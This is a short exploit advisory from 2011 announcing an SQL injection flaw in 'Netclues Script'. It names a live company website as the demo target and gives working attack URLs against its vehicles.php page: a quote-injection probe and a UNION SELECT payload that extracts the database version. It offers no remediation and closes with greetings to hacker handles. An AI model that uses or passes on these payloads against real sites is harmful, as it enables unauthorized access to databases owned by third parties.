# Exploit Title: Netclues Script SQL injection Vulnerability # Date: 20/06/2011 # Author: HeRoTuRK- ( http://by-heroturk.blogspot.com/ ) #Demo :https://www.marshalls.ky/ # Tested on: Windows 7 # Greetz; F0RTYS3V3N - Lazmania61 - BlackApple - JackTheRipper - System-Hacker #Https://www.marshalls.ky/vehicles.php?id=4'a # Https://www.marshalls.ky/vehicles.php?id=-4 union select 1,version(),3,4,5,6--